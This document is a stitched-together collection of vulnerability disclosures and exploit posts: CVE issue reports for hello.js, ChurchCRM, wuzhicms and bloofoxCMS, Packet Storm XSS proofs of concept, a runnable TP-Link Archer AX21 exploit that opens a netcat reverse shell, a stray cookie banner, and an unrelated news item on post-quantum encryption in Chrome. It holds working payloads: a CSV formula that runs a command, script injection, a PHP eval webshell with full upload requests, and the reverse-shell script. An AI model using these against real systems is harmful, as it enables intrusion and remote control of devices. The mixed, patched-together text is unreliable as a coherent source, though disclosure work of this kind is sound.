Prototype pollution vulnerability in MrSwitch hello.js version 1.18.6, allows remote attackers to execute arbitrary code via hello.utils.extend function.

**Abstract**

The function hello.utils.extend, defined in file hello.js, introduces a Prototype Pollution vulnerability, which could result in Cross-Site Scripting.

hello.utils \= {

// Extend the first object with the properties and methods of the second

extend: function(r /\*, a\[, b\[, ...\]\] \*/) {

// Get the arguments as an array but ommit the initial item

Array.prototype.slice.call(arguments, 1).forEach(function(a) {

if (Array.isArray(r) && Array.isArray(a)) {

Array.prototype.push.apply(r, a);

}

else if (r && (r instanceof Object || typeof r \=== 'object') && a && (a instanceof Object || typeof a \=== 'object') && r !== a) {

for (var x in a) {

r\[x\] \= hello.utils.extend(r\[x\], a\[x\]);

}

}

else {

if (Array.isArray(a)) {

// Clone it

a \= a.slice(0);

}

r \= a;

}

});

return r;

}

};

The code on Line 29 has a typical pattern of Prototype Pollution.

    r[x] = hello.utils.extend(r[x], a[x]);
    

The vulnerable lines of code, then, are called on Line 1320, which could allow attackers to pollute the object in JavaScript.  

p \= \_this.merge(\_this.param(location.search || ''), \_this.param(location.hash || ''));

**Proof of Concepts**

As a result, websites, which use the hello.js, might highly likely have Cross-Site Scripting. Take the offical demo of hello.js as an example, the Prototype Pollution could be exploited as follows:

https://adodson.com/hello.js/demos/events.html#state={%22a%22:%221%22,%22\_\_proto\_\_%22:{%22callback%22:%22alert%22}}  
https://adodson.com/hello.js/demos/events.html#state={%22a%22:%221%22,%22\_\_proto\_\_%22:{%22onbeforescriptexecute%22:%22alert(location.href)%22}}  

**Suggestion**

*   Freeze the prototype— use Object.freeze (Object.prototype).
*   Require schema validation of JSON input.
*   Avoid using unsafe recursive merge functions.
*   Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
*   As a best practice use Map instead of Object.

CVE-2021-26505: Prototype Pollution in hello.js · Issue #634 · MrSwitch/hello.js

CSV Injection vulnerability in ChurchCRM version 4.2.0, allows remote attackers to execute arbitrary code via crafted CSV file.

**Vulnerability Name:** CSV Injection/ Formula Injection  
**Severity:** High  
**Description:** CSV Injection (aka Excel Macro Injection or Formula Injection) exists in List Event Types feature in ChurchCRM v4.2.0 via Name field that is mistreated while exporting to a CSV file.  
**Impact:** Arbitrary formulas can be injected into CSV files which can lead to remote code execution at the client or data leakage via maliciously injected hyper-links.  
**Version Affected:** 4.2.0  
**Payload Used:** =10+20+cmd|' /C calc'!A0  
**Vulnerable URL:** master/EventNames.php  
**Vulnerable Parameters:** Name  
**Steps to Reproduce:**

1.  Login to the application, goto 'Events' module and then "List Event Types"
2.  Edit any event and inject the payload =10+20+cmd|' /C calc'!A0 in the 'Name' field
3.  Now goto 'List Event types' module and click CSV to download the CSV file
4.  Open the CSV file, allow all popups and our payload is executed (calculator is opened).  
      
    

**Note:** Incase the payload does not execute, then enable 'External Content' and 'Macro' settings in Excel. Goto Excel > File > Options > Trust Center > Trust Center Settings > Macro/External Content.  
**References:**  
https://nvd.nist.gov/vuln/detail/CVE-2019-12134  
http://cwe.mitre.org/data/definitions/1236.html

Just to confirm, this is not an issue with our CSV import but if a row had bad data the exported CVS has an issue. We use https://datatables.net/ if you have a chance, maybe you can help see if they have fixed that.

@DawoudIO I think the problem lies in the export feature. It would be nice to have an option in download csv to escape strings that begin with "+","-","@", or "=" by prepending "\\t".  
For any cell that begins with one of the formula triggering characters =, -, +, or @, you should directly prefix it with a tab character.

I'm not seeing how this is a particularly useful bug report. Anyone can create a CSV file with any arbitrary text in it using **any text editor** or text generation tool. How using ChurchCRM to generate a CSV with questionable content is a "bug" leaves me perplexed. For example, this logic implies the bash echo command has this same _"bug"_ too:

echo -e "Header 1, Header 2, Header 3\\n1,=10+20+cmd|' /C calc'!A0,Foo bar\\n2,Hello world,Text text" \> test.csv

If there was a method to use unauthenticated access to ChurchCRM that allowed insertion of arbitrary data values AND generate a CSV AND somehow send that somewhere then _maybe_ I'd consider this a flaw in ChurchCRM. Maybe I'm missing something?

I understand that this vulnerability would be much impactful if any unauthenticated user would be able to inject the payload resulting into code execution on the internal user's system. However this could also be impactful, if any internal user of the application enters the payload which results into impacting all the other user of the application. Here the payload is entered on ChurchCRM application leaving the application at fault to generate a file which can execute malicious commands on the user's system. A user may embed Dynamic Data Exchange (DDE) formulas to perform code execution, download a backdoor, open a malicious website etc.  
The legitimate user may download the file because of following reasons:

1.  The user trusts the site that the content is coming from.
2.  The user assumes that it is only a csv file and that it won't contain functions or macro's and won't care about any warnings from Excel about potential malicious functionality in the file.

https://owasp.org/www-community/attacks/CSV\_Injection#:~:text=CSV%20Injection%2C%20also%20known%20as,the%20software%20as%20a%20formula.  
https://payatu.com/csv-injection-basic-to-exploit

Feel free to create a PR.

CVE-2020-28848: CSV Injection Vulnerability · Issue #5465 · ChurchCRM/CRM

Cross Site Scripting (XSS) vulnerability in ChurchCRM version 4.2.1, allows remote attckers to execute arbitrary code and gain sensitive information via crafted payload in Add New Deposit field in View All Deposit module.

**Name:** Stored Cross Site Scripting leading to Remote File Inclusion vulnerability  
**Description:** ChurchCRM application allows stored XSS , via 'Add new Deposit' module, that is rendered upon 'View All Deposits' page visit.  
Cross Site Scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of JavaScript) to the web application. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser.  
**Impact:** The vulnerability allows an attacker to send malicious JavaScript code which could result in hijacking of the user's cookie/session tokens , redirecting the user to a malicious webpage, downloading malicious files hosted on attackers server and performing many other unintended browser actions.  
**Version Affected:** 4.2.1 and below  
**Payload Used:**  
<script>var link = document.createElement('a'); link.href = 'http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe'; link.download = ''; document.body.appendChild(link); link.click(); </script>  
**Vulnerable URL:** /master/FindDepositSlip.php  
**Vulnerable Parameters:** Deposit Comment  
**Steps to Reproduce:**

1.  Login to the application, go to 'View all Deposits' module.
2.  Add the payload in the 'Deposit Comment' field and click "Add New Deposit".
3.  Payload is executed and a .exe file is downloaded.

**Reference :**  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17205  
**POC :**  
  
  
**Mitigation:**  
Proper input validation and encoding should be employed to prevent the execution of any hazardous scripts.  
**Note:** There are multiple locations apart from Deposit module where the input is not sanitized properly

CVE-2020-28849: Cross Site Scripting Vulnerability leading to Remote File Inclusion · Issue #5477 · ChurchCRM/CRM

Buffer Overflow vulnerability in cFilenameInit parameter in browseForDoc function in Foxit Software Foxit PDF Reader version 10.1.0.37527, allows local attackers to cause a denial of service (DoS) via crafted .pdf file.

This website uses cookies to provide you with the best possible experience and to optimize the website to best fit the needs of our visitors. By using this website, you automatically agree to the use of cookies and your IP address. For detailed information on the use of cookies on this website, please see our Privacy Policy .

OK

CVE-2020-35990: PDF Software & Tools Tailored to Your Business | Foxit

An issue was disocvered in wuzhicms version 4.1.0, allows remote attackers to execte arbitrary code via the setting parameter to the ueditor in index.php.

The location where the vulnerability was triggered：  
/coreframe/app/attachment/admin/index.php

Locate the function "ueditor", when the parameter "submit" exists, the value of "setting" will be passed to the function "set\_cache" for execution.  
When the parameter "submit" does not exist, the content of the cache file will be executed directly;

The "set\_cache" function does not filter the variable "data" (the parameter "setting" passed in) and saves it directly in the cache file:

The saved cache file path is: /caches/_cache_/ ueditor.dt72K.php

So we can construct the following poc：

http://192.168.114.150/index.php?m=attachment&f=index&v=ueditor&_su=wuzhicms&submit=1&setting=<?php echo phpinfo();?> 

**Vulnerability recurrence**

First：log in system

Second：Execute poc:  

You can see that the shell file is successfully written:

Third：Visit:

http://192.168.114.150/index.php?m=attachment&f=index&v=ueditor&_su=wuzhicms

You can see the successful execution of the shell script:

**Repair method**

Strictly filter the parameter setting;

CVE-2020-36037: wuzhicms v4.1.0 has a write webshell vulnerability · Issue #192 · wuzhicms/wuzhicms

File Upload vulnerability in bloofoxCMS version 0.5.2.1, allows remote attackers to execute arbitrary code and escalate privileges via crafted webshell file to upload module.

I want to report an arbitrary file upload vulnerability that I found in bloofoxcms 0.5.2.1, through which we can upload webshell and control the web server.  
After entering the web management background, we can use the upload function to upload files：  
  
We create a new webshell file and name it script.php ：

    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
    

Click to select this file(script.php) :  
  
Click upload file(s) and grab the data package:  
  
First request package:

    POST /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------36808327791705981033859481452
    Content-Length: 1187
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="dir"
    
    ../media/images/
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file1"; filename="script.php"
    Content-Type: application/octet-stream
    
    <?php @eval($_GET[1]);
    echo 'upload success';
    ?>
     
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file2"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file3"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file4"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="file5"; filename=""
    Content-Type: application/octet-stream
    
    
    -----------------------------36808327791705981033859481452
    Content-Disposition: form-data; name="send"
    
    Upload File(s)
    -----------------------------36808327791705981033859481452--
    
    

First response package ：

    HTTP/1.1 302 Found
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:43:52 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    LOCATION: index.php?mode=tools&page=upload
    Content-Length: 0
    

Then we follow 302 redirection，  
Second request package ：

    GET /bloofoxCMS/admin/index.php?mode=tools&page=upload HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Origin: http://127.0.0.1
    Connection: close
    Referer: http://127.0.0.1/bloofoxCMS/admin/index.php?mode=tools&page=upload
    Cookie: sid=o89l00kuhepcn1h7ls87vfsqa1
    Upgrade-Insecure-Requests: 1
    

Second response package ：

    HTTP/1.1 200 OK
    Server: nginx/1.15.11
    Date: Fri, 25 Dec 2020 12:44:38 GMT
    Content-Type: text/html; charset=UTF-8
    Connection: close
    X-Powered-By: PHP/7.1.9
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Length: 6820
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    
    <html>
    <head>
    <title>bloofoxCMS Admincenter</title>
    <meta http-equiv="Content-Type" content="text/html; charset=" />
    <meta name="AUTHOR" content="bloofox, Alexander Lang" />
    <meta name="COPYRIGHT" content="bloofox.com, Alex Lang" />
    <meta name="DATE" content="12/25/2020" />
    <meta name="DESCRIPTION" content="bloofoxCMS Admincenter is the backend for managing the contents of bloofoxCMS" />
    <meta name="TITLE" content="bloofoxCMS Admincenter" />
    <link rel="stylesheet" type="text/css" href="../templates/admincenter/admincenter.css" />
    <link rel="icon" href="../media/images/favicon.ico" type="image/x-icon" />
    <link rel="shortcut icon" href="../media/images/favicon.ico" type="image/x-icon" />
    
    <script type="text/javascript" src="functions.js"></script>
    
    </head>
    
    <body>
    <div id="profile">
    	<a class='edit' href='index.php?page=myprofile' title='Edit Profile'><img src='../templates/admincenter/images/icon-set16/profile_edit.png' alt='Edit Profile' border='0' width='16' height='16' /></a>  <a href='index.php?page=myprofile'>Edit Profile</a><br />
    	<a class='edit' href='index.php?page=changepw' title='Change Password'><img src='../templates/admincenter/images/icon-set16/edit.png' alt='Change Password' border='0' width='16' height='16' /></a>  <a href='index.php?page=changepw'>Change Password</a><br /> 
    	<a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a><br />
    	
    	<div class="close">
    	<a href="#" onclick="show_hide_layers('profile','','hide');">Close [x]</a>
    	</div>
    </div>
    
    <div id="wrap">
    	<div id="header">
    	<div style="float: left;"><span class="bold">bloofoxCMS Admincenter</span></div>
    	<div style="text-align: right; font-size: 11px; font-weight: bold;">
    	<a href="#" onclick="show_hide_layers('profile','','show');">Username: admin</a> &nbsp;&nbsp; <a class='delete' href='index.php?mode=logout' title='Logout'><img src='../templates/admincenter/images/icon-set16/logout.png' alt='Logout' border='0' width='16' height='16' /></a>  <a href='index.php?mode=logout'>Logout</a></div> 
    	<hr />
    	</div>
    	
    	<div id="sidebar">
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php" title='Home'>Home</a></li> 
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=content" title='Contents'>Contents</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=content&page=levels">Structure</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=pages">Pages</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=articles">Articles</a></li>
    	<li><a class='subalways' href="index.php?mode=content&page=media">Media</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=settings" title='Administration'>Administration</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=settings">Settings</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=projects">Projects</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=lang">Languages</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=tmpl">Templates</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=plugins">Plugins</a></li>
    	<li><a class='subalways' href="index.php?mode=settings&page=charset">Charsets</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='always' href="index.php?mode=user" title='Security'>Security</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=user">User</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=groups">User Groups</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=permissions">Permissions</a></li>
    	<li><a class='subalways' href="index.php?mode=user&page=sessions">Sessions</a></li>
    </ul>
    </div>
    
    <div class="menu">
    <ul>
    	<li><a class='current' href="index.php?mode=tools" title='Tools'>Tools</a></li> 
    </ul>
    </div>
    <div class="submenu">
    <ul>
    	<li><a class='subalways' href="index.php?mode=tools">Maintenance</a></li>
    	<li><a class='subcurrent' href="index.php?mode=tools&page=upload">Upload</a></li>
    	
    	
    	<li><a class='subalways' href="index.php?mode=tools&page=phpmyadmin">PhpMyAdmin</a></li>
    	<li><a class='subalways' href="index.php?mode=tools&page=stats">Statistics</a></li>
    </ul>
    </div>
    </div>
    	<div id="space"></div>
    	<div id="main" onclick="show_hide_layers('profile','','hide');">
    		<div id="content">
    		
    		
    <h2>Tools / Upload</h2>
    <div id="content-inlay">
    
    <p class='ok'><img src='../templates/admincenter/images/icon-set16/ok.png' alt='ok.png' border='0' width='16' height='16' /> Files have been uploaded successful.</p>
    
    <form action="index.php?mode=tools&page=upload" method="post" enctype="multipart/form-data">
    <table class="list">
    <tr class='bg_color3'>
    	<td width="150"></td>
    	<td></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Directory</td>
    	<td><select name='dir'><option value='../media/images/'>../media/images/</option><option value='../media/files/'>../media/files/</option><option value='../languages/'>../languages/</option><option value='../templates/admincenter'>../templates/admincenter</option><option value='../templates/default'>../templates/default</option><option value='../media/images/profiles'>../media/images/profiles</option></select></td>
    </tr>
    <tr class='bg_color2'>
    	<td>Template Image</td>
    	<td><input type='checkbox' name='tmplimage' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file1' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file2' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file3' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file4' size='30' maxlength='250' /></td>
    </tr>
    <tr class='bg_color2'>
    	<td>File</td>
    	<td><input type='file' name='file5' size='30' maxlength='250' /></td>
    </tr>
    </table>
    <br />
    <input class='btn' type='submit' name='send' value='Upload File(s)' />
    </form>
    </div>
    
    		
    		</div>
    	</div>
    
    	<div id="footer">
    	<hr />
    	<div style="text-align: right; float: right; font-size: 11px;"><a href='#'>Back to Top</a></div>
    	<div style="text-align: left; font-size: 11px;">
    Powered by <a href="http://www.bloofox.com" target="bloofox">bloofoxCMS</a> &copy; 2012</div>
    	</div>
    </div>
    
    </body>
    </html>
    

We can see that the file has been successfully uploaded to /bloofoxcms/media/images/script.php  

Finally, we can access the webshell address and execute any command：

CVE-2020-36082: An arbitrary file upload vulnerability was found · Issue #7 · alexlang24/bloofoxCMS

TP-Link Archer AX21 suffers from an unauthenticated remote command injection vulnerability.

    #!/usr/bin/python3# # Exploit Title: TP-Link Archer AX21 - Unauthenticated Command Injection# Date: 07/25/2023# Exploit Author: Voyag3r (https://github.com/Voyag3r-Security)# Vendor Homepage: https://www.tp-link.com/us/# Version: TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 (https://www.tenable.com/cve/CVE-2023-1389)# Tested On: Firmware Version 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0# CVE: CVE-2023-1389## Disclaimer: This script is intended to be used for educational purposes only.# Do not run this against any system that you do not have permission to test. # The author will not be held responsible for any use or damage caused by this # program. # # CVE-2023-1389 is an unauthenticated command injection vulnerability in the web# management interface of the TP-Link Archer AX21 (AX1800), specifically, in the# *country* parameter of the *write* callback for the *country* form at the # "/cgi-bin/luci/;stok=/locale" endpoint. By modifying the country parameter it is # possible to run commands as root. Execution requires sending the request twice;# the first request sets the command in the *country* value, and the second request # (which can be identical or not) executes it. # # This script is a short proof of concept to obtain a reverse shell. To read more # about the development of this script, you can read the blog post here:# https://medium.com/@voyag3r-security/exploring-cve-2023-1389-rce-in-tp-link-archer-ax21-d7a60f259e94# Before running the script, start a nc listener on your preferred port -> run the script -> profitimport requests, urllib.parse, argparsefrom requests.packages.urllib3.exceptions import InsecureRequestWarning# Suppress warning for connecting to a router with a self-signed certificaterequests.packages.urllib3.disable_warnings(InsecureRequestWarning)# Take user input for the router IP, and attacker IP and portparser = argparse.ArgumentParser()parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")parser.add_argument("-a", "--attacker", dest = "attacker", default = "127.0.0.1", help="Attacker IP")parser.add_argument("-p", "--port",dest = "port", default = "9999", help="Local port")args = parser.parse_args()# Generate the reverse shell command with the attacker IP and portrevshell = urllib.parse.quote("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc " + args.attacker + " " + args.port + " >/tmp/f")# URL to obtain the reverse shellurl_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"# Send the URL twice to run the command. Sending twice is necessary for the attackr = requests.get(url_command, verify=False)r = requests.get(url_command, verify=False)

TP-Link Archer AX21 Command Injection

Easy Web Portal version 2.1.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Easy Web Portal v2.1.1 XSS Vulnerability                                                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.p30vel.ir                                                                                               || # Dork      : EWP a été construit avec Easy Web Portal v2.1.1                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects /tst/index.php .[+] URL encoded GET input admin was set to 0' onmouseover=prompt(976752) bad='[+] The input is reflected inside a tag parameter between single quotes.Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Easy Web Portal 2.1.1 Cross Site Scripting

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,933)
*   Arbitrary (16,196)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,861)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,770)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,671)
*   Local (14,448)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,145)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,765)
*   Root (3,581)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,366)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,770)
*   Web (9,663)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,932)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,812)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,428)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,808)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,573)
*   Other

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

Google has announced plans to add support for quantum-resistant encryption algorithms in its Chrome browser, starting with version 116.
"Chrome will begin supporting X25519Kyber768 for establishing symmetric secrets in TLS, starting in Chrome 116, and available behind a flag in Chrome 115," Devon O'Brien said in a post published Thursday.
Kyber was chosen by the U.S. Department of Commerce's

Encryption / Browser Security

Google has announced plans to add support for quantum-resistant encryption algorithms in its Chrome browser, starting with version 116.

"Chrome will begin supporting X25519Kyber768 for establishing symmetric secrets in TLS, starting in Chrome 116, and available behind a flag in Chrome 115," Devon O'Brien said in a post published Thursday.

Kyber was chosen by the U.S. Department of Commerce's National Institute of Standards and Technology (NIST) as the candidate for general encryption in a bid to tackle future cyber attacks posed by the advent of quantum computing. Kyber-768 is roughly the security equivalent of AES-192.

The encryption algorithm has already been adopted by Cloudflare, Amazon Web Services, and IBM.

X25519Kyber768 is a hybrid algorithm that combines the output of X25519, an elliptic curve algorithm widely used for key agreement in TLS, and Kyber-768 to create a strong session key to encrypt TLS connections.

"Hybrid mechanisms such as X25519Kyber768 provide the flexibility to deploy and test new quantum-resistant algorithms while ensuring that connections are still protected by an existing secure algorithm," O'Brien explained.

While it's expected to take several years, possibly even decades, for quantum computers to pose severe risks, certain kinds of encryption are susceptible to an attack called "harvest now, decrypt later" (aka retrospective decryption) in which data that's encrypted today is harvested by threat actors in hopes of decrypting it later when cryptanalysis becomes easier due to technological breakthroughs.

This is where quantum computers come in, as they are capable of efficiently performing certain computations in a manner that can trivially defeat existing cryptographic implementations.

"In TLS, even though the symmetric encryption algorithms that protect the data in transit are considered safe against quantum cryptanalysis, the way that the symmetric keys are created is not," O'Brien said.

"This means that in Chrome, the sooner we can update TLS to use quantum-resistant session keys, the sooner we can protect user network traffic against future quantum cryptanalysis."

Enterprises that face network appliance incompatibility issues following the rollout are advised to disable X25519Kyber768 in Chrome using the PostQuantumKeyAgreementEnabled enterprise policy, which is available starting in Chrome 116, as a temporary measure.

The development comes as Google said it's changing the release cadence of Chrome security updates from bi-weekly to weekly to minimize the attack window and address the growing patch gap problem that allows threat actors more time to weaponize published n-day and zero-day flaws.

"Bad actors could possibly take advantage of the visibility into these fixes and develop exploits to apply against browser users who haven't yet received the fix," Amy Ressler from the Chrome Security Team said. "That's why we believe it's really important to ship security fixes as soon as possible, to minimize this 'patch gap.'"

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web